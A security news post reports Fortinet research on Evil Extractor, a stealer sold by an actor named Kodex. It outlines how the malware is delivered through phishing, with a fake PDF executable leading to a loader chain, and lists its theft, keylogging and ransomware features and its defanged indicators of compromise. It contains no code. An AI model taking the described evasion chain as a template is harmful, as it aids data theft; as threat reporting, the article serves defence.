May 11, 2024

Researchers have spotted a stealer malware named as Evil Extractor (originally marketed as an educational tool) is being marketed for sale for other threat actors to steal data and files from Windows systems.

It has several modules that all work via an FTP service, it also contains environment checking and Anti-VM functions. Its primarily focuses steal browser data and information from compromised endpoints and then upload it to the attacker’s FTP server. Majority  of the victims located in Europe and the U.S.

Sold by an actor named Kodex,  it’s continually updates and packs in various modules to siphon system metadata, passwords, and cookies from various web browsers as well as record keystrokes and even act as a ransomware by encrypting files on the target system.

Advertisements

As a part of the new campaign, the malware has been used as part of a phishing emails that lure recipients into launching an executable that masquerades as a PDF document under the pretext of confirming their account details.

The Account_Info.exe binary is an obfuscated Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch Evil Extractor. The malware, besides gathering files, can also activate the webcam and capture screenshots.

The report concluded stating, Evil Extractor is being used as a comprehensive info stealer with multiple malicious features, including ransomware. Its PowerShell script can elude detection in a .NET loader or PyArmor.

This research was documented by researchers from Fortinet

Indicators of Compromise

  • 45[.]87[.]81[.]184
  • 193[.]42[.]33[.]232
  • 352efd1645982b8d23a841107007c8b4b024eb6bb5d6b312e5783ce4aa62b685
  • 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e
  • 75688c32a3c1f04df0fc02491180c8079d7fdc0babed981f5860f22f5e118a5e
  • 826c7c112dd1ae80469ef81f5066003d7691a349e6234c8f8ca9637b0984fc45
  • b1ef1654839b73f03b73c4ef4e20ce4ecdef2236ec6e1ca36881438bc1758dcd
  • 17672795fb0c8df81ab33f5403e0e8ed15f4b2ac1e8ac9fef1fec4928387a36d
Tags:

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

You may have missed

Dell Technologies suffers a data breach

May 11, 2024

Google Patches emergency Zeroday Vulnerability in Chrome-CVE-2024-4671

May 10, 2024

ZScaler investigates the data breach claim

May 9, 2024

Cato at RSA 2024 – Log4j Vulnerability is still most exploitable

May 8, 2024

Tinyproxy Critical Vulnerability – CVE-2023-49606

May 7, 2024

Nvidia addresses Critical Vulnerability in Triton -CVE-2024-0087

May 6, 2024

Discover more from TheCyberThrone

Subscribe now to keep reading and get access to the full archive.

Continue reading